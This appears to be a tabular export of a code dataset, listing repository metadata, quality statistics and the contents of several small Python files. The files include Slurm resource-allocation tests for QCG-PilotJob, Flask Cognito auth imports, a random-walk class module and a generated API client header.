| 4,053
| 5.039014
| 0.100616
| 0.08802
| 0.08476
| 0.127139
| 0.91035
| 0.872453
| 0.869601
| 0.869601
| 0.869601
| 0.825998
| 0
| 0.002026
| 0.26943
| 4,053
| 115
| 66
| 35.243478
| 0.826748
| 0
| 0
| 0.801887
| 0
| 0
| 0.05727
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.056604
| false
| 0.056604
| 0.179245
| 0
| 0.235849
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
8c04ccd10af2afec087d7c12c33e7d9db916f468
| 166
|
py
|
Python
|
tests/markers.py
|
vyahello/newspaper-parser
|
ad986dfc43e089f376ffe96251cf6481df133329
|
[
"MIT"
] | null | null | null |
tests/markers.py
|
vyahello/newspaper-parser
|
ad986dfc43e089f376ffe96251cf6481df133329
|
[
"MIT"
] | 3
|
2020-08-20T10:19:16.000Z
|
2022-01-28T10:38:22.000Z
|
tests/markers.py
|
vyahello/newspaper-parser
|
ad986dfc43e089f376ffe96251cf6481df133329
|
[
"MIT"
] | null | null | null |
# flake8: noqa
import _pytest.mark
import pytest
unit: _pytest.mark.MarkDecorator = pytest.mark.unit
functional: _pytest.mark.MarkDecorator = pytest.mark.functional
| 23.714286
| 63
| 0.813253
| 21
| 166
| 6.285714
| 0.380952
| 0.378788
| 0.348485
| 0.439394
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0.006667
| 0.096386
| 166
| 6
| 64
| 27.666667
| 0.873333
| 0.072289
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
8c61d6d467731d6a9df40ca3901d4f3a43055617
| 73
|
py
|
Python
|
backend/products/tests/test_data/__init__.py
|
MaCkRage/optimize_sql
|
346011fbda5ddf96a3c34357820452e165b7767c
|
[
"MIT"
] | null | null | null |
backend/products/tests/test_data/__init__.py
|
MaCkRage/optimize_sql
|
346011fbda5ddf96a3c34357820452e165b7767c
|
[
"MIT"
] | null | null | null |
backend/products/tests/test_data/__init__.py
|
MaCkRage/optimize_sql
|
346011fbda5ddf96a3c34357820452e165b7767c
|
[
"MIT"
] | null | null | null |
from .generate_update_products_data import generate_update_products_data
| 36.5
| 72
| 0.931507
| 10
| 73
| 6.2
| 0.6
| 0.451613
| 0.709677
| 0.83871
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.054795
| 73
| 1
| 73
| 73
| 0.898551
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 9
|
4fb46eafd9771b113e834508594c7169ed1d6a2e
| 22,079
|
py
|
Python
|
components/core/qcg/pilotjob/tests/test_slurmenv.py
|
LourensVeen/QCG-PilotJob
|
e78c35a9b16b1042a2d5b54352a2ca2e3a58c6b9
|
[
"Apache-2.0"
] | null | null | null |
components/core/qcg/pilotjob/tests/test_slurmenv.py
|
LourensVeen/QCG-PilotJob
|
e78c35a9b16b1042a2d5b54352a2ca2e3a58c6b9
|
[
"Apache-2.0"
] | null | null | null |
components/core/qcg/pilotjob/tests/test_slurmenv.py
|
LourensVeen/QCG-PilotJob
|
e78c35a9b16b1042a2d5b54352a2ca2e3a58c6b9
|
[
"Apache-2.0"
] | null | null | null |
import pytest
from os import environ, mkdir, stat
from os.path import dirname, join, isdir, exists, abspath
import tempfile
import logging
import asyncio
import time
from shutil import rmtree
import sys
from qcg.pilotjob.service import QCGPMService
from qcg.pilotjob.slurmres import in_slurm_allocation, get_num_slurm_nodes
from qcg.pilotjob.executionjob import LauncherExecutionJob
from qcg.pilotjob.joblist import Job, JobExecution, JobResources, ResourceSize, JobDependencies
from qcg.pilotjob.tests.utils import save_reqs_to_file, check_job_status_in_json, get_slurm_resources, \
get_slurm_resources_binded, set_pythonpath_to_qcg_module
from qcg.pilotjob.tests.utils import SHARED_PATH
def test_slurmenv_simple_resources():
if not in_slurm_allocation() or get_num_slurm_nodes() < 2:
pytest.skip('test not run in slurm allocation or allocation is smaller than 2 nodes')
get_slurm_resources()
def test_slurmenv_simple_resources_binding():
if not in_slurm_allocation() or get_num_slurm_nodes() < 2:
pytest.skip('test not run in slurm allocation or allocation is smaller than 2 nodes')
print('SLURM_NODELIST: {}'.format(environ.get('SLURM_NODELIST', None)))
print('SLURM_JOB_CPUS_PER_NODE: {}'.format(environ.get('SLURM_JOB_CPUS_PER_NODE', None)))
print('SLURM_CPU_BIND_LIST: {}'.format(environ.get('SLURM_CPU_BIND_LIST', None)))
print('SLURM_CPU_BIND_TYPE: {}'.format(environ.get('SLURM_CPU_BIND_TYPE', None)))
print('CUDA_VISIBLE_DEVICES: {}'.format(environ.get('CUDA_VISIBLE_DEVICES', None)))
get_slurm_resources_binded()
#def test_slurmenv_simple_job(caplog):
# caplog.set_level(logging.DEBUG)
def test_slurmenv_simple_job():
if not in_slurm_allocation() or get_num_slurm_nodes() < 2:
pytest.skip('test not run in slurm allocation or allocation is smaller than 2 nodes')
resources, allocation = get_slurm_resources_binded()
resources_node_names = set(n.name for n in resources.nodes)
set_pythonpath_to_qcg_module()
tmpdir = str(tempfile.mkdtemp(dir=SHARED_PATH))
file_path = join(tmpdir, 'jobs.json')
print('tmpdir: {}'.format(tmpdir))
jobName = 'mdate'
jobs = [job.to_dict() for job in [
Job(jobName,
JobExecution(
'date',
wd = abspath(join(tmpdir, 'date.sandbox')),
stdout = 'date.out',
stderr = 'date.err'
),
JobResources( numCores=ResourceSize(1) )
)
] ]
reqs = [ { 'request': 'submit', 'jobs': jobs },
{ 'request': 'control', 'command': 'finishAfterAllTasksDone' } ]
save_reqs_to_file(reqs, file_path)
print('jobs saved to file_path: {}'.format(str(file_path)))
sys.argv = [ 'QCG-PilotJob', '--log', 'debug', '--file', '--file-path', str(file_path), '--wd', tmpdir,
'--report-format', 'json']
QCGPMService().start()
jobEntries = check_job_status_in_json([ jobName ], workdir=tmpdir, dest_state='SUCCEED')
assert all((isdir(abspath(join(tmpdir, 'date.sandbox'))),
exists(join(abspath(join(tmpdir, 'date.sandbox')), 'date.out')),
exists(join(abspath(join(tmpdir, 'date.sandbox')), 'date.err')),
stat(join(abspath(join(tmpdir, 'date.sandbox')), 'date.out')).st_size > 0))
# there can be some debugging messages in the stderr
# stat(join(abspath(join(tmpdir, 'date.sandbox')), 'date.err')).st_size == 0))
for jname, jentry in jobEntries.items():
assert all(('runtime' in jentry, 'allocation' in jentry.get('runtime', {})))
jalloc = jentry['runtime']['allocation']
for jalloc_node in jalloc.split(','):
node_name = jalloc_node[:jalloc_node.index('[')]
print('{} in available nodes ({})'.format(node_name, ','.join(resources_node_names)))
assert node_name in resources_node_names, '{} not in nodes ({}'.format(
node_name, ','.join(resources_node_names))
with pytest.raises(ValueError):
check_job_status_in_json([jobName + 'xxx'], workdir=tmpdir, dest_state='SUCCEED')
rmtree(tmpdir)
def test_slurmenv_simple_script():
if not in_slurm_allocation() or get_num_slurm_nodes() < 2:
pytest.skip('test not run in slurm allocation or allocation is smaller than 2 nodes')
resources, allocation = get_slurm_resources_binded()
resources_node_names = set(n.name for n in resources.nodes)
set_pythonpath_to_qcg_module()
tmpdir = str(tempfile.mkdtemp(dir=SHARED_PATH))
file_path = join(tmpdir, 'jobs.json')
print('tmpdir: {}'.format(tmpdir))
jobName = 'mdate_script'
jobs = [job.to_dict() for job in [
Job(jobName,
JobExecution(
script = '/bin/date\n/bin/hostname\n',
wd = abspath(join(tmpdir, 'date.sandbox')),
stdout = 'date.out',
stderr = 'date.err'
),
JobResources( numCores=ResourceSize(1) )
)
] ]
reqs = [ { 'request': 'submit', 'jobs': jobs },
{ 'request': 'control', 'command': 'finishAfterAllTasksDone' } ]
save_reqs_to_file(reqs, file_path)
print('jobs saved to file_path: {}'.format(str(file_path)))
sys.argv = [ 'QCG-PilotJob', '--log', 'debug', '--file', '--file-path', str(file_path), '--wd', tmpdir,
'--report-format', 'json']
QCGPMService().start()
jobEntries = check_job_status_in_json([ jobName ], workdir=tmpdir, dest_state='SUCCEED')
assert all((isdir(abspath(join(tmpdir, 'date.sandbox'))),
exists(join(abspath(join(tmpdir, 'date.sandbox')), 'date.out')),
exists(join(abspath(join(tmpdir, 'date.sandbox')), 'date.err')),
stat(join(abspath(join(tmpdir, 'date.sandbox')), 'date.out')).st_size > 0,
stat(join(abspath(join(tmpdir, 'date.sandbox')), 'date.err')).st_size == 0))
for jname, jentry in jobEntries.items():
assert all(('runtime' in jentry, 'allocation' in jentry.get('runtime', {})))
jalloc = jentry['runtime']['allocation']
for jalloc_node in jalloc.split(','):
node_name = jalloc_node[:jalloc_node.index('[')]
print('{} in available nodes ({})'.format(node_name, ','.join(resources_node_names)))
assert node_name in resources_node_names, '{} not in nodes ({}'.format(
node_name, ','.join(resources_node_names))
with pytest.raises(ValueError):
check_job_status_in_json([jobName + 'xxx'], workdir=tmpdir, dest_state='SUCCEED')
rmtree(tmpdir)
def test_slurmenv_many_cores():
if not in_slurm_allocation() or get_num_slurm_nodes() < 2:
pytest.skip('test not run in slurm allocation or allocation is smaller than 2 nodes')
resources, allocation = get_slurm_resources_binded()
resources_node_names = set(n.name for n in resources.nodes)
set_pythonpath_to_qcg_module()
tmpdir = str(tempfile.mkdtemp(dir=SHARED_PATH))
file_path = join(tmpdir, 'jobs.json')
print('tmpdir: {}'.format(tmpdir))
jobName = 'hostname'
jobwdir_base = 'hostname.sandbox'
cores_num = 2
jobs = [job.to_dict() for job in [
Job(jobName,
JobExecution(
exec = 'mpirun',
args = [ '--allow-run-as-root', 'hostname' ],
wd = abspath(join(tmpdir, jobwdir_base)),
stdout = 'hostname.out',
stderr = 'hostname.err',
modules = [ 'mpi/openmpi-x86_64' ]
),
JobResources(numCores=ResourceSize(cores_num) )
)
] ]
reqs = [ { 'request': 'submit', 'jobs': jobs },
{ 'request': 'control', 'command': 'finishAfterAllTasksDone' } ]
save_reqs_to_file(reqs, file_path)
print('jobs saved to file_path: {}'.format(str(file_path)))
sys.argv = [ 'QCG-PilotJob', '--log', 'debug', '--file', '--file-path', str(file_path), '--wd', tmpdir,
'--report-format', 'json']
QCGPMService().start()
jobEntries = check_job_status_in_json([ jobName ], workdir=tmpdir, dest_state='SUCCEED')
assert all((isdir(abspath(join(tmpdir, jobwdir_base))),
exists(join(abspath(join(tmpdir, jobwdir_base)), 'hostname.out')),
exists(join(abspath(join(tmpdir, jobwdir_base)), 'hostname.err')),
stat(join(abspath(join(tmpdir, jobwdir_base)), 'hostname.out')).st_size > 0))
job_nodes = []
allocated_cores = 0
for jname, jentry in jobEntries.items():
assert all(('runtime' in jentry, 'allocation' in jentry.get('runtime', {})))
jalloc = jentry['runtime']['allocation']
for jalloc_node in jalloc.split(','):
node_name = jalloc_node[:jalloc_node.index('[')]
job_nodes.append(node_name)
print('{} in available nodes ({})'.format(node_name, ','.join(resources_node_names)))
assert node_name in resources_node_names, '{} not in nodes ({}'.format(
node_name, ','.join(resources_node_names))
ncores = len(jalloc_node[jalloc_node.index('[') + 1:-1].split(':'))
allocated_cores += ncores
assert allocated_cores == cores_num, allocated_cores
# check if hostname is in stdout in two lines
with open(abspath(join(tmpdir, join(jobwdir_base, 'hostname.out'))), 'rt') as stdout_file:
stdout_content = [line.rstrip() for line in stdout_file.readlines()]
assert len(stdout_content) == cores_num, str(stdout_content)
assert all(hostname in job_nodes for hostname in stdout_content), str(stdout_content)
with pytest.raises(ValueError):
check_job_status_in_json([jobName + 'xxx'], workdir=tmpdir, dest_state='SUCCEED')
rmtree(tmpdir)
def test_slurmenv_many_nodes():
if not in_slurm_allocation() or get_num_slurm_nodes() < 2:
pytest.skip('test not run in slurm allocation or allocation is smaller than 2 nodes')
resources, allocation = get_slurm_resources_binded()
resources_node_names = set(n.name for n in resources.nodes)
set_pythonpath_to_qcg_module()
tmpdir = str(tempfile.mkdtemp(dir=SHARED_PATH))
file_path = join(tmpdir, 'jobs.json')
print('tmpdir: {}'.format(tmpdir))
jobName = 'hostname'
jobwdir_base = 'hostname.sandbox'
cores_num = 1
nodes_num = 2
jobs = [job.to_dict() for job in [
Job(jobName,
JobExecution(
exec = 'mpirun',
args = [ '--allow-run-as-root', 'hostname' ],
wd = abspath(join(tmpdir, jobwdir_base)),
stdout = 'hostname.out',
stderr = 'hostname.err',
modules = [ 'mpi/openmpi-x86_64' ]
),
JobResources(numCores=ResourceSize(cores_num), numNodes=ResourceSize(nodes_num))
)
] ]
reqs = [ { 'request': 'submit', 'jobs': jobs },
{ 'request': 'control', 'command': 'finishAfterAllTasksDone' } ]
save_reqs_to_file(reqs, file_path)
print('jobs saved to file_path: {}'.format(str(file_path)))
sys.argv = [ 'QCG-PilotJob', '--log', 'debug', '--file', '--file-path', str(file_path), '--wd', tmpdir,
'--report-format', 'json']
QCGPMService().start()
jobEntries = check_job_status_in_json([ jobName ], workdir=tmpdir, dest_state='SUCCEED')
assert all((isdir(abspath(join(tmpdir, jobwdir_base))),
exists(join(abspath(join(tmpdir, jobwdir_base)), 'hostname.out')),
exists(join(abspath(join(tmpdir, jobwdir_base)), 'hostname.err')),
stat(join(abspath(join(tmpdir, jobwdir_base)), 'hostname.out')).st_size > 0))
job_nodes = []
allocated_cores = 0
for jname, jentry in jobEntries.items():
assert all(('runtime' in jentry, 'allocation' in jentry.get('runtime', {})))
jalloc = jentry['runtime']['allocation']
for jalloc_node in jalloc.split(','):
node_name = jalloc_node[:jalloc_node.index('[')]
job_nodes.append(node_name)
print('{} in available nodes ({})'.format(node_name, ','.join(resources_node_names)))
assert node_name in resources_node_names, '{} not in nodes ({}'.format(
node_name, ','.join(resources_node_names))
ncores = len(jalloc_node[jalloc_node.index('[') + 1:-1].split(':'))
allocated_cores += ncores
assert len(job_nodes) == nodes_num, str(job_nodes)
assert allocated_cores == nodes_num * cores_num, allocated_cores
# check if hostname is in stdout in two lines
with open(abspath(join(tmpdir, join(jobwdir_base, 'hostname.out'))), 'rt') as stdout_file:
stdout_content = [line.rstrip() for line in stdout_file.readlines()]
assert len(stdout_content) == nodes_num * cores_num, str(stdout_content)
assert all(hostname in job_nodes for hostname in stdout_content), str(stdout_content)
with pytest.raises(ValueError):
check_job_status_in_json([jobName + 'xxx'], workdir=tmpdir, dest_state='SUCCEED')
rmtree(tmpdir)
def test_slurmenv_many_nodes_no_cores():
if not in_slurm_allocation() or get_num_slurm_nodes() < 2:
pytest.skip('test not run in slurm allocation or allocation is smaller than 2 nodes')
resources, allocation = get_slurm_resources_binded()
resources_node_names = set(n.name for n in resources.nodes)
set_pythonpath_to_qcg_module()
tmpdir = str(tempfile.mkdtemp(dir=SHARED_PATH))
file_path = join(tmpdir, 'jobs.json')
print('tmpdir: {}'.format(tmpdir))
jobName = 'hostname'
jobwdir_base = 'hostname.sandbox'
nodes_num = 2
jobs = [job.to_dict() for job in [
Job(jobName,
JobExecution(
exec = 'mpirun',
args = [ '--allow-run-as-root', 'hostname' ],
wd = abspath(join(tmpdir, jobwdir_base)),
stdout = 'hostname.out',
stderr = 'hostname.err',
modules = [ 'mpi/openmpi-x86_64' ]
),
JobResources(numNodes=ResourceSize(nodes_num))
)
] ]
reqs = [ { 'request': 'submit', 'jobs': jobs },
{ 'request': 'control', 'command': 'finishAfterAllTasksDone' } ]
save_reqs_to_file(reqs, file_path)
print('jobs saved to file_path: {}'.format(str(file_path)))
sys.argv = [ 'QCG-PilotJob', '--log', 'debug', '--file', '--file-path', str(file_path), '--wd', tmpdir,
'--report-format', 'json']
QCGPMService().start()
jobEntries = check_job_status_in_json([ jobName ], workdir=tmpdir, dest_state='SUCCEED')
assert all((isdir(abspath(join(tmpdir, jobwdir_base))),
exists(join(abspath(join(tmpdir, jobwdir_base)), 'hostname.out')),
exists(join(abspath(join(tmpdir, jobwdir_base)), 'hostname.err')),
stat(join(abspath(join(tmpdir, jobwdir_base)), 'hostname.out')).st_size > 0))
job_nodes = []
allocated_cores = 0
for jname, jentry in jobEntries.items():
assert all(('runtime' in jentry, 'allocation' in jentry.get('runtime', {})))
jalloc = jentry['runtime']['allocation']
for jalloc_node in jalloc.split(','):
node_name = jalloc_node[:jalloc_node.index('[')]
job_nodes.append(node_name)
print('{} in available nodes ({})'.format(node_name, ','.join(resources_node_names)))
assert node_name in resources_node_names, '{} not in nodes ({}'.format(
node_name, ','.join(resources_node_names))
ncores = len(jalloc_node[jalloc_node.index('[') + 1:-1].split(':'))
allocated_cores += ncores
assert len(job_nodes) == nodes_num, str(job_nodes)
assert allocated_cores > nodes_num, allocated_cores
# check if hostname is in stdout in two lines
with open(abspath(join(tmpdir, join(jobwdir_base, 'hostname.out'))), 'rt') as stdout_file:
stdout_content = [line.rstrip() for line in stdout_file.readlines()]
assert len(stdout_content) == allocated_cores, str(stdout_content)
assert all(hostname in job_nodes for hostname in stdout_content), str(stdout_content)
with pytest.raises(ValueError):
check_job_status_in_json([jobName + 'xxx'], workdir=tmpdir, dest_state='SUCCEED')
rmtree(tmpdir)
def test_slurmenv_many_nodes_many_cores():
if not in_slurm_allocation() or get_num_slurm_nodes() < 2:
pytest.skip('test not run in slurm allocation or allocation is smaller than 2 nodes')
resources, allocation = get_slurm_resources_binded()
resources_node_names = set(n.name for n in resources.nodes)
set_pythonpath_to_qcg_module()
tmpdir = str(tempfile.mkdtemp(dir=SHARED_PATH))
file_path = join(tmpdir, 'jobs.json')
print('tmpdir: {}'.format(tmpdir))
jobName = 'hostname'
jobwdir_base = 'hostname.sandbox'
cores_num = resources.nodes[0].free
nodes_num = resources.total_nodes
jobs = [job.to_dict() for job in [
Job(jobName,
JobExecution(
exec = 'mpirun',
args = [ '--allow-run-as-root', 'hostname' ],
wd = abspath(join(tmpdir, jobwdir_base)),
stdout = 'hostname.out',
stderr = 'hostname.err',
modules = [ 'mpi/openmpi-x86_64' ]
),
JobResources(numCores=ResourceSize(cores_num), numNodes=ResourceSize(nodes_num))
)
] ]
reqs = [ { 'request': 'submit', 'jobs': jobs },
{ 'request': 'control', 'command': 'finishAfterAllTasksDone' } ]
save_reqs_to_file(reqs, file_path)
print('jobs saved to file_path: {}'.format(str(file_path)))
sys.argv = [ 'QCG-PilotJob', '--log', 'debug', '--file', '--file-path', str(file_path), '--wd', tmpdir,
'--report-format', 'json']
QCGPMService().start()
jobEntries = check_job_status_in_json([ jobName ], workdir=tmpdir, dest_state='SUCCEED')
assert all((isdir(abspath(join(tmpdir, jobwdir_base))),
exists(join(abspath(join(tmpdir, jobwdir_base)), 'hostname.out')),
exists(join(abspath(join(tmpdir, jobwdir_base)), 'hostname.err')),
stat(join(abspath(join(tmpdir, jobwdir_base)), 'hostname.out')).st_size > 0))
job_nodes = []
allocated_cores = 0
for jname, jentry in jobEntries.items():
assert all(('runtime' in jentry, 'allocation' in jentry.get('runtime', {})))
jalloc = jentry['runtime']['allocation']
for jalloc_node in jalloc.split(','):
node_name = jalloc_node[:jalloc_node.index('[')]
job_nodes.append(node_name)
print('{} in available nodes ({})'.format(node_name, ','.join(resources_node_names)))
assert node_name in resources_node_names, '{} not in nodes ({}'.format(
node_name, ','.join(resources_node_names))
ncores = len(jalloc_node[jalloc_node.index('[') + 1:-1].split(':'))
print('#{} cores on node {}'.format(ncores, node_name))
allocated_cores += ncores
assert len(job_nodes) == nodes_num, str(job_nodes)
assert allocated_cores == nodes_num * cores_num, allocated_cores
# check if hostname is in stdout in two lines
with open(abspath(join(tmpdir, join(jobwdir_base, 'hostname.out'))), 'rt') as stdout_file:
stdout_content = [line.rstrip() for line in stdout_file.readlines()]
assert len(stdout_content) == nodes_num * cores_num, str(stdout_content)
assert all(hostname in job_nodes for hostname in stdout_content), str(stdout_content)
with pytest.raises(ValueError):
check_job_status_in_json([jobName + 'xxx'], workdir=tmpdir, dest_state='SUCCEED')
rmtree(tmpdir)
def test_slurmenv_launcher_agents():
pytest.skip('somehow this test doesn\t properly close event loop')
if not in_slurm_allocation() or get_num_slurm_nodes() < 2:
pytest.skip('test not run in slurm allocation or allocation is smaller than 2 nodes')
resources, allocation = get_slurm_resources_binded()
# with tempfile.TemporaryDirectory(dir=SHARED_PATH) as tmpdir:
set_pythonpath_to_qcg_module()
tmpdir = tempfile.mkdtemp(dir=SHARED_PATH)
print('tmpdir: {}'.format(tmpdir))
try:
auxdir = join(tmpdir, 'qcg')
print("aux directory set to: {}".format(auxdir))
mkdir(auxdir)
if asyncio.get_event_loop() and asyncio.get_event_loop().is_closed():
asyncio.set_event_loop(asyncio.new_event_loop())
LauncherExecutionJob.start_agents(tmpdir, auxdir, resources.nodes, resources.binding)
try:
assert len(LauncherExecutionJob.launcher.agents) == resources.total_nodes
# there should be only one launcher per node, so check based on 'node' in agent['data']['slurm']
node_names = set(node.name for node in resources.nodes)
for agent_name, agent in LauncherExecutionJob.launcher.agents.items():
print("found agent {}: {}".format(agent_name, str(agent)))
assert all(('process' in agent, 'data' in agent, 'options' in agent.get('data', {}))), str(agent)
assert all(('slurm' in agent['data'], 'node' in agent.get('data', {}).get('slurm', {}))), str(agent)
assert agent['data']['slurm']['node'] in node_names
assert all(('binding' in agent['data']['options'], agent['data']['options']['binding'] == True)), str(agent)
node_names.remove(agent['data']['slurm']['node'])
assert len(node_names) == 0
# launching once more should raise exception
with pytest.raises(Exception):
LauncherExecutionJob.start_agents(tmpdir, auxdir, resources.nodes, resources.binding)
finally:
asyncio.get_event_loop().run_until_complete(asyncio.ensure_future(LauncherExecutionJob.stop_agents()))
time.sleep(1)
asyncio.get_event_loop().close()
finally:
rmtree(tmpdir)
pass
| 43.123047
| 124
| 0.633951
| 2,686
| 22,079
| 5.000745
| 0.083023
| 0.032013
| 0.045563
| 0.031269
| 0.85408
| 0.834723
| 0.823705
| 0.823705
| 0.823705
| 0.812835
| 0
| 0.003687
| 0.226052
| 22,079
| 511
| 125
| 43.207436
| 0.782362
| 0.026813
| 0
| 0.800512
| 0
| 0
| 0.167598
| 0.010804
| 0
| 0
| 0
| 0
| 0.099744
| 1
| 0.023018
| false
| 0.002558
| 0.038363
| 0
| 0.061381
| 0.069054
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4fdbd075820069d64a3ec6846326bd045290fce9
| 208
|
py
|
Python
|
flask_cognito_auth/__init__.py
|
gergnz/flask-cognito-auth
|
9139313c121c065876fb708e6b3300f61f105639
|
[
"MIT"
] | null | null | null |
flask_cognito_auth/__init__.py
|
gergnz/flask-cognito-auth
|
9139313c121c065876fb708e6b3300f61f105639
|
[
"MIT"
] | null | null | null |
flask_cognito_auth/__init__.py
|
gergnz/flask-cognito-auth
|
9139313c121c065876fb708e6b3300f61f105639
|
[
"MIT"
] | null | null | null |
from .cognito_auth_manager import CognitoAuthManager
from .decorators import login_handler
from .decorators import logout_handler
from .decorators import callback_handler
from .decorators import is_logged_in
| 34.666667
| 52
| 0.879808
| 27
| 208
| 6.518519
| 0.518519
| 0.318182
| 0.454545
| 0.460227
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.096154
| 208
| 5
| 53
| 41.6
| 0.93617
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
4ff64972eb98a3bdfd7e61796c1675f23eed7f16
| 254
|
py
|
Python
|
Python/BasicTutorials/kids.py
|
ronkitay/Rons-Tutorials
|
c0459c57cc24b546847ec24afa94d2c1e5373bd4
|
[
"MIT"
] | null | null | null |
Python/BasicTutorials/kids.py
|
ronkitay/Rons-Tutorials
|
c0459c57cc24b546847ec24afa94d2c1e5373bd4
|
[
"MIT"
] | null | null | null |
Python/BasicTutorials/kids.py
|
ronkitay/Rons-Tutorials
|
c0459c57cc24b546847ec24afa94d2c1e5373bd4
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python
# -*- coding: utf-8 -*-
child_name = raw_input(u'\u05DE\u05B7\u05D4 \u05E9\u05B0\u05DE\u05B5\u05DA?\n')
print u'\u05D0\u05B8\u05E0\u05B4\u05D9 \u05D0\u05D5\u05B9\u05D4\u05B5\u05D1 \u05D0\u05D5\u05B9\u05EA\u05B8\u05DA',
print child_name
| 42.333333
| 114
| 0.744094
| 42
| 254
| 4.428571
| 0.690476
| 0.096774
| 0.16129
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.298319
| 0.062992
| 254
| 6
| 115
| 42.333333
| 0.483193
| 0.149606
| 0
| 0
| 0
| 0.333333
| 0.725581
| 0.627907
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0.666667
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 8
|
8b2c13100267adfe8d861824a38bf5ad0a2b19e2
| 690
|
py
|
Python
|
Clases/ProgDinamicaEstocastica/caminoAleatorio/borracho.py
|
juanpanu/Juan_DS_Path
|
24e71616dae692e931e95cd3815ca88fa9b8a46a
|
[
"MIT"
] | null | null | null |
Clases/ProgDinamicaEstocastica/caminoAleatorio/borracho.py
|
juanpanu/Juan_DS_Path
|
24e71616dae692e931e95cd3815ca88fa9b8a46a
|
[
"MIT"
] | null | null | null |
Clases/ProgDinamicaEstocastica/caminoAleatorio/borracho.py
|
juanpanu/Juan_DS_Path
|
24e71616dae692e931e95cd3815ca88fa9b8a46a
|
[
"MIT"
] | null | null | null |
import random
class Borracho:
def __init__(self,nombre):
self.nombre = nombre
class BorrachoTradicional(Borracho):
def __init__(self, nombre):
super().__init__(nombre)
def camina(self):
return random.choice([(0,1),(0,-1),(1,0), (-1,0)])
class Drogado(Borracho):
def __init__(self, nombre):
super().__init__(nombre)
def camina(self):
return (
random.choice([
(random.random(), random.random() * -1),
(random.random() * -1, random.random()),
(random.random() * -1, random.random() * -1),
(random.random(), random.random()),
])
)
| 23.793103
| 61
| 0.527536
| 71
| 690
| 4.84507
| 0.225352
| 0.383721
| 0.313953
| 0.22093
| 0.776163
| 0.703488
| 0.703488
| 0.703488
| 0.703488
| 0.703488
| 0
| 0.025105
| 0.307246
| 690
| 29
| 62
| 23.793103
| 0.694561
| 0
| 0
| 0.333333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.238095
| false
| 0
| 0.047619
| 0.095238
| 0.52381
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 10
|
8b402cb9141badbb0c472a59509d6dbf06a23f75
| 39,086
|
py
|
Python
|
atom/nucleus/python/nucleus_api/api/household_api.py
|
ShekharPaatni/SDK
|
6534ffdb63af87c02c431df9add05a90370183cb
|
[
"Apache-2.0"
] | 11
|
2019-04-16T02:11:17.000Z
|
2021-12-16T22:51:40.000Z
|
atom/nucleus/python/nucleus_api/api/household_api.py
|
ShekharPaatni/SDK
|
6534ffdb63af87c02c431df9add05a90370183cb
|
[
"Apache-2.0"
] | 81
|
2019-11-19T23:24:28.000Z
|
2022-03-28T11:35:47.000Z
|
atom/nucleus/python/nucleus_api/api/household_api.py
|
ShekharPaatni/SDK
|
6534ffdb63af87c02c431df9add05a90370183cb
|
[
"Apache-2.0"
] | 11
|
2020-07-08T02:29:56.000Z
|
2022-03-28T10:05:33.000Z
|
# coding: utf-8
"""
Hydrogen Nucleus API
The Hydrogen Nucleus API # noqa: E501
OpenAPI spec version: 1.9.4
Contact: info@hydrogenplatform.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from nucleus_api.api_client import ApiClient
class HouseholdApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
